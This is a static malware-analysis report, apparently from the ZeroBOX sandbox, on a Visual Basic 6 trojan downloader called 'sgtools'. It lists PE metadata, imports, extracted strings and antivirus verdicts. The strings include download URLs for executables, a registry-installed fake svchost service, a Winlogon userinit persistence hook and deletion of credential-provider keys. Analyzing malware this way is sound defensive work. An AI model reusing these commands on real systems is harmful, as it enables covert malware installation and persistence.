Static | ZeroBOX

PE Compile Time

2019-03-15 19:09:34

PE Imphash

bc9d0037d54dc1aef8e90b93cb7890f4

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000172d0 0x00018000 5.39076600904
.data 0x00019000 0x00005624 0x00001000 0.0
.rsrc 0x0001f000 0x000018c4 0x00002000 3.09725359012

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0001f3dc 0x00000a74 LANG_NEUTRAL SUBLANG_NEUTRAL dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON 0x0001f3c8 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data
RT_VERSION 0x0001f150 0x00000264 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data

Imports

Library MSVBVM60.DLL:
0x401000 __vbaVarTstGt
0x401004 __vbaStrI2
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaFreeVarList
0x401020 __vbaEnd
0x401024 _adj_fdiv_m64
0x401028 __vbaFreeObjList
0x40102c __vbaLineInputVar
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaSetSystemError
0x401040 _adj_fdiv_m32
0x401044 __vbaExitProc
0x401048 None
0x40104c __vbaObjSet
0x401050 __vbaOnError
0x401054 _adj_fdiv_m16i
0x401058 __vbaObjSetAddref
0x40105c _adj_fdivr_m16i
0x401060 None
0x401064 __vbaFPFix
0x401068 _CIsin
0x40106c __vbaChkstk
0x401070 __vbaFileClose
0x401074 EVENT_SINK_AddRef
0x401078 __vbaStrCmp
0x40107c None
0x401080 __vbaObjVar
0x401084 __vbaI2I4
0x401088 DllFunctionCall
0x40108c _adj_fpatan
0x401090 __vbaStrR8
0x401094 EVENT_SINK_Release
0x401098 None
0x40109c _CIsqrt
0x4010a4 __vbaExceptHandler
0x4010a8 __vbaPrintFile
0x4010ac _adj_fprem
0x4010b0 _adj_fdivr_m64
0x4010b4 None
0x4010b8 __vbaFPException
0x4010bc __vbaStrVarVal
0x4010c0 __vbaVarCat
0x4010c4 _CIlog
0x4010c8 __vbaErrorOverflow
0x4010cc __vbaFileOpen
0x4010d0 __vbaR8Str
0x4010d4 __vbaNew2
0x4010d8 _adj_fdiv_m32i
0x4010dc _adj_fdivr_m32i
0x4010e0 __vbaFreeStrList
0x4010e4 _adj_fdivr_m32
0x4010e8 _adj_fdiv_r
0x4010ec None
0x4010f0 None
0x4010f4 __vbaVarDup
0x4010f8 __vbaStrToAnsi
0x4010fc __vbaVarCopy
0x401100 __vbaFpI4
0x401104 __vbaLateMemCallLd
0x401108 _CIatan
0x40110c __vbaStrMove
0x401110 None
0x401114 _allmul
0x401118 _CItan
0x40111c None
0x401120 _CIexp
0x401124 __vbaFreeStr
0x401128 __vbaFreeObj

Strings

!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Command1
Command1
Label2
label2
Label1
label1
vb6chs.dll
sgtools
h{R?*I
Module1
Form10
Form11
Command4
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Command5
Command6
Command1
Command2
Command3
urlmon
URLDownloadToFileA
h{R?*I
Command8
Command9
Command10
Command11
Command12
Command7
shell32.dll
ShellExecuteA
shlwapi.dll
PathFileExistsA
kernel32
DeleteFileA
Q[T Et
VBA6.DLL
__vbaOnError
__vbaFreeObj
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
Label2
Label1
CreateWaitableTimerA
OpenWaitableTimerA
SetWaitableTimer
CancelWaitableTimer
CloseHandle
WaitForSingleObject
user32
MsgWaitForMultipleObjects
__vbaEnd
__vbaPrintFile
__vbaFreeVar
__vbaVarTstGt
__vbaFileClose
__vbaLineInputVar
__vbaFileOpen
__vbaStrI2
__vbaStrMove
__vbaFreeStr
__vbaStrCat
__vbaSetSystemError
__vbaStrToAnsi
__vbaVarMove
__vbaI2I4
__vbaObjSetAddref
__vbaFreeVarList
__vbaVarDup
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCmp
__vbaVarCat
__vbaStrVarVal
__vbaLateMemCallLd
__vbaStrVarMove
__vbaObjVar
tXT{vU_
__vbaVarCopy
__vbaErrorOverflow
N:g?bir
__vbaExitProc
__vbaStrR8
__vbaR8Str
__vbaFPFix
__vbaFpI4
gyrCg3u
yrCg3u
eyrCg3u
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form10
Form10
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Q[T Et
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form11
Me.Caption = "
Command1.Caption = "
Command2.Caption = "steam
Command3.Caption = "
Command4.Caption = "
Command5.Caption = "
Command6.Caption = "
pubwinol"
Form11
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
h{R?*I
Command12
Command12
Command11
Command11
Command10
Command10
Command9
Command9
Command8
Command8
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
jTh@n@
RGhpp@
QGh<q@
QGh`q@
}#jTh@n@
WWhT}@
jTh(m@
MSVBVM60.DLL
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
__vbaLineInputVar
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaExitProc
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFPFix
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
__vbaStrCmp
__vbaObjVar
__vbaI2I4
DllFunctionCall
_adj_fpatan
__vbaStrR8
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaPrintFile
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaR8Str
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaStrToAnsi
__vbaVarCopy
__vbaFpI4
__vbaLateMemCallLd
_CIatan
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
OAtAWA%
A*\AD:\vbfiles\sgtools0315\form1.vbp
pubwinol
xwwvbab0501
xww579
xwwyaya8989
http://safe.ywxww.net:820/sg.txt
c:\windows\sg.txt
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
http://safe.ywxww.net:820/sgupdate.exe
c:\windows\sgupdate.exe
c:\windows\fn.txt
c:\windows\fp.txt
WScript.Shell
Desktop
SpecialFolders
cmd /c sc config wuauserv start= auto
cmd /c sc start wuauserv
http://ftp.ywxww.net:820/KB2808679x64.exe
\KB2808679x64.msu
http://ftp.ywxww.net:820/KB2868626x64.exe
\KB2868626x64.msu
http://safe.ywxww.net:820/vc17x86.exe
\vc17x86.exe
http://ftp.ywxww.net:820/vc17x64.exe
\vc17x64.exe
http://ftp.ywxww.net:820/steam.txt
c:\windows\steam.reg
regedit /s c:\windows\steam.reg
VC2017
http://safe.ywxww.net:820/svchost.exe
c:\windows\svchost.exe
http://safe.ywxww.net:820/xconfig.txt
c:\windows\xconfig.ini
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Type /t reg_dword /d 00000272 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Start /t reg_dword /d 00000002 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ErrorControl /t reg_dword /d 00000001 /f /reg:64
http://ftp.ywxww.net:820/pubwin1506.exe
\pubwin1506.exe
http://ftp.ywxww.net:820/pubolclient.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v WOW64 /t reg_dword /d 00000001 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Group /t reg_sz /d "Event Log" /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v DisplayName /t reg_sz /d svchost /f /reg:64
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v wxDesktop /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ObjectName /t reg_sz /d LocalSystem /f /reg:64
cmd /c RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
http://safe.ywxww.net:820/cpie.exe
Remote
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v FailureActions /t reg_binary /d "ffffffff000000000000000001000000140000000100000001000000" /f /reg:64
c:\windows\system\xww.exe
http://ftp.ywxww.net:820/ydcx.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ImagePath /t reg_expand_sz /d "c:\Windows\svchost.exe /service" /f /reg:64
c:\windows\syswow64\DesktopLauncher.exe
cmd /c sc delete "client start"
office2010
cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /reg:64 >nul 2>nul && reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /t reg_sz /d 1 /f /reg:64||exit
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
ol,Pub
c:\windows\system\config.txt
Winrar5.2
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
PB1506
Pbol926
cmd /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /t reg_sz /d C:\Windows\system32\userinit.exe,c:\windows\system\xww.exe /f /reg:64
http://safe.ywxww.net:820/xww.exe
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Startup /t reg_sz /d "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /f /reg:64
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v desktop /t reg_sz /d %USERPROFILE%\Desktop /f /reg:64
\Internet Explorer.lnk
\Internt Explorer.exe
\pubolclient.exe
\ydcx.exe
cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v {871C5380-42A0-1069-A2EA-08002B30308D} /t reg_dword /d 1 /f /reg:64
\internet.exe
\Internt Explorer.lnk
http://ftp.ywxww.net:820/x210.exe
\x210.exe
http://ftp.ywxww.net:820/qqnetbar.exe
\qqnetbar.exe
http://ftp.ywxww.net:820/hydkj.exe
\hydkj.exe
http://ftp.ywxww.net:820/RemotelyAnywhere11.exe
\RemotelyAnywhere11.exe
http://ftp.ywxww.net:820/pubolconsole.exe
\pubolconsole.exe
http://ftp.ywxww.net:820/qwsrv3.3.exe
\qwsrv3.3.exe
http://ftp.ywxww.net:820/smb.exe
\smb.exe
http://ftp.ywxww.net:820/rlol.exe
\rlpbol.exe
\rlol.exe
http://ftp.ywxww.net:820/rlpb15.exe
\rlpb15.exe
http://ftp.ywxww.net:820/pbconsole1507.exe
\pbconsole1507.exe
http://ftp.ywxww.net:820/rlaz.exe
\rlaz.exe
Pubin15
pubwinol
http://ftp.ywxww.net:820/cysoft/winrarx64521sc.exe
\winrarx64521sc.exe
http://ftp.ywxww.net:820/cysoft/office2010.exe
\office2010.exe
[clsWaitableTimer.Wait]
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/pubolupdate.exe
\pubolupdate.exe
C:\Windows\System32\GroupPolicy\User\Scripts\Logon\script.vbs
explorer C:\Windows\System32\GroupPolicy\User\Scripts\Logon
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
Comments
CompanyName
ProductName
sgtools
FileVersion
1.03.0003
ProductVersion
1.03.0003
InternalName
OriginalFilename
sg.exe

Antivirus Signature

Bkav W32.Common.3B4BCA8C
Lionic Trojan.Win32.Redcap.4!c
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Agent
Skyhigh BehavesLike.Win32.Infected.cm
McAfee Artemis!48BC0B9203E4
Cylance Unsafe
Zillya Downloader.Generic.Win32.8270
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:Win32/Redcap.7e31b189
K7GW Clean
K7AntiVirus Clean
huorong HEUR:Trojan/VBCode.a
Baidu Clean
VirIT Trojan.Win32.VBGenus.FZC
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast Win32:Malware-gen
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.xabcvr
BitDefender Trojan.GenericKD.74630897
NANO-Antivirus Trojan.Win32.Dwn.fxfrnd
ViRobot Trojan.Win.Z.Bulz.114688.B
MicroWorld-eScan Trojan.GenericKD.74630897
Tencent Win32.Trojan.Agent.Yolw
Sophos Mal/Generic-S
F-Secure Trojan.TR/Redcap.dqzcq
DrWeb Trojan.DownLoader29.40575
VIPRE Trojan.GenericKD.74630897
TrendMicro TROJ_GEN.R06EC0RK324
McAfeeD ti!B0CBF6B1C6E6
Trapmine Clean
CTX exe.trojan.redcap
Emsisoft Trojan.GenericKD.74630897 (B)
Ikarus Clean
FireEye Trojan.GenericKD.74630897
Jiangmin TrojanDownloader.Generic.bdhh
Webroot Clean
Varist W32/ABApplication.UDPT-6682
Avira TR/Redcap.dqzcq
Fortinet W32/Dloader.X!tr
Antiy-AVL Trojan/Win32.Fuerboos
Kingsoft malware.kb.a.960
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D472C6F1
SUPERAntiSpyware Clean
ZoneAlarm Trojan.Win32.Agent.xabcvr
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Trojan/Win32.Tiggre.C3452069
Acronis Clean
VBA32 Trojan.Agent
TACHYON Clean
Malwarebytes Generic.Malware/Suspicious
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R06EC0RK324
Rising Downloader.Generic!8.141 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.1728101.susgen
GData Trojan.GenericKD.74630897
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
alibabacloud Clean

No IRMA results available.